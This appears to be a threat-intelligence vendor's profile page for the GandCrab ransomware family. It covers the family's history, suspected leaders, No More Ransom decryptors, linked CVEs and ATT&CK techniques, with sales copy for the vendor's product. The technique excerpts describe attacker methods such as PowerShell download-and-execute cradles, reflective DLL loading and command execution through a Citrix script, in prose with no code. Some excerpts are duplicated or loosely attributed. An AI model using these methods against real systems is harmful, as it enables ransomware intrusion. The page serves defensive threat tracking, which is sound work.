GandCrab
GandCrab is a ransomware family operated as a ransomware-as-a-service (RaaS) platform. It was first advertised and launched in early 2018 and primarily spread through spam emails containing malicious attachments; reporting also links some 2019 distribution activity to hijacked or abused GoDaddy-registered domains, and other malware such as FormBook and Storm-0324-delivered payload chains have been observed distributing GandCrab. Europol-supported investigations state GandCrab had more than one million victims worldwide, and the operators claimed the operation generated over $2 billion before voluntarily shutting down in May 2019.
The malware encrypts victim files and extorts payment for decryption. Content also links GandCrab to reflective DLL loading techniques used to load libraries directly into process memory without standard Windows API usage. A 2026 network-forensics paper cited in the source material analyzed GandCrab and Ryuk packet behavior to derive suspicious and malicious packet signatures for earlier detection.
GandCrab is consistently described as the predecessor to REvil/Sodinokibi, with multiple reports stating that REvil emerged in 2019 as its successor and that some GandCrab affiliates moved to REvil. German authorities and other reporting identify Daniil Maksimovich Shchukin (alias UNKN/UNKNOWN) as a suspected leader of GandCrab and later REvil, and Anatoly Sergeevitsch Kravchuk as a suspected developer/operator. Since 2018, Europol has supported a Romanian-led investigation into GandCrab; joint law-enforcement efforts led to decryptors for versions V1, V4, and V5 through V5.2 via No More Ransom, reportedly enabling more than 49,000 system decryptions and preventing over €60 million in ransom losses.
High-confidence associations in the content include use against businesses and organizations globally, distribution by spam-email campaigns, and historical delivery by Storm-0324. Mentioned indicators and related artifacts are limited in the source material; one article ties GandCrab campaigns in February 2019 to the same types of abused domains previously used in bomb-threat spam campaigns.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware. | Atlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack... Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware.
Groups observed using it
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Storm-0324 has distributed a range of first-stage payloads since at least 2016, including: ... GandCrab ransomware
“…the operators of Gandcrab, GOLD GARDEN, retired and sold their operation to an affiliate group we now call GOLD SOUTHFIELD.”
Techniques & procedures
16 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueIn January 2019, it was reported that some domains that were registered at GoDaddy had been sending ransom bomb threats... These messages appeared to be from domains owned by legitimate, well-known brands. The group... was exploiting a vulnerability in GoDaddy’s DNS setup platform... They would then use the automated service to send mail from dormant domains.
Initial Access
3 techniquesThe Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.
These messages appeared to be from domains owned by legitimate, well-known brands... They would then use the automated service to send mail from dormant domains.
Execution
3 techniquesA primary suspect for malicious code download and in-memory execution in the recent period is PowerShell... PowerShell is launched with Invoke-Expression cmdlet evaluating code downloaded from a Pastebin web page using the Net.WebClient.DownloadString function, which downloads a web page as a string and stores it in memory.
Citrix ADC maintains a vulnerable Perl script (newbm.pl) that, when accessed via HTTP POST request ... allows local operating system (OS) commands to execute. Attackers can use this functionality to upload/execute command and control (C2) software ... and gain unauthorized access to the OS.
First advertised in early 2018, GandCrab initially spread through spam emails containing malicious attachments.
Persistence
1 techniquePrivilege Escalation
1 techniqueStealth
5 techniquesObfuscation and polymorphic nature of malware make them more difficult to identify by Antivirus system.
Obfuscation and polymorphic nature of malware make them more difficult to identify by Antivirus system.
The Gandcrab ransomware affiliate program first surfaced in January 2018, and paid enterprising hackers huge shares of the profits just for hacking into user accounts at major corporations.
One popular technique we're seeing at this time is the use of living-off-the-land binaries — or "LoLBins"... LoLBins are used by different actors combined with fileless malware and legitimate cloud services to improve chances of staying undetected within an organisation, usually during post-exploitation attack phases.
Popular malware like Sodinokibi and Gandcrab have used reflect DLL loaders in the past that allows attackers to load a dynamic library into process memory without using Windows API... the obfuscated Cobalt Strike beacon... gets deobfuscated with a static XOR key and loaded into memory using reflective loading techniques.
Exfiltration
3 techniquesThe Gandcrab team would then try to expand that access, often siphoning vast amounts of sensitive and internal documents in the process.
In addition, in some cases, extensive data were also spied on and threatened with the publication of this, unless a ransom was paid.
...pioneered the practice of double extortion — charging victims once for a key needed to unlock hacked systems, and a separate payment in exchange for a promise not to publish stolen data.
Impact
2 techniquesAfter successfully encrypting a business’ data, REvil affiliates demand large ransoms up to US $70 million in exchange for a decryption key
The perpetrators demanded large ransom payments in exchange for decrypting and not leaking data.
Recent activity
44 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Related Articles: ... German authorities identify REvil and GandCrab ransomware bosses ...
Prolific ransomware family first seen in early 2018, responsible for significant global financial damage before being succeeded by REvil/Sodinokibi.
A ransomware family operated as a ransomware-as-a-service platform, primarily distributed through spam emails, used for extortion by encrypting data and threatening non-publication/decryption unless ransom was paid.
Ransomware operation allegedly run by the actor known as UNKN, active from January 2018 until May 2019 and reported to have collected over $2 billion in ransom payments.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.